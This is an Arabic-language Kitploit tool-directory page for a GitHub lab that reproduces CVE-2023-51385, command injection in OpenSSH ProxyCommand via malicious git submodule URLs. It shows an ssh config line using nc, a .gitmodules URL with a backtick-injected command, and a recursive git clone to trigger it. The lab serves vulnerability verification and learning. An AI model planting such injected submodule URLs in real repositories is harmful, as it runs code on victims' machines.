Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2023-51385 — مختبر إعادة إنتاج لثغرة CVE-2023-51385: حقن أوامر في OpenSSH ProxyCommand عبر عناوين URL فرعية ضارة لـ git. دليل خطوة بخطوة للتحقق من الثغرة. | Kitploit
أدوات/GitHubGitHub/lsp1025923/cve-2023-51385
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHublsp1025923/cve-2023-51385

cve-2023-51385

مختبر إعادة إنتاج لثغرة CVE-2023-51385: حقن أوامر في OpenSSH ProxyCommand عبر عناوين URL فرعية ضارة لـ git. دليل خطوة بخطوة للتحقق من الثغرة.

عرض المستودع
منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

التحقق من CVE-2023-51385

أولاً، تحتاج إلى إضافة المحتوى التالي في ~/.ssh/config

root@kitploit:~
host *.example.com
  ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p

يوجد حقن أوامر في عبارة ملف .gitmodules

root@kitploit:~
url = ssh://`echo helloworld > cve.txt`foo.example.com/bar

بعد الانتهاء من التكوين، قم بتنفيذ الأمر التالي لتشغيله

root@kitploit:~
git clone https://github.com/LtmThink/CVE-2023-51385_test --recurse-submodules

إذا تم التنفيذ بنجاح، فسيتم إنشاء ملف cve.txt في دليل CVE-2023-51385_test

image-20240317161540677

ملاحظة: OpenSSH يجب أن يكون <9.6p1

لمزيد من التفاصيل، راجع هذه المدونة:

https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

cve-2023-51385

تنزيل الأداة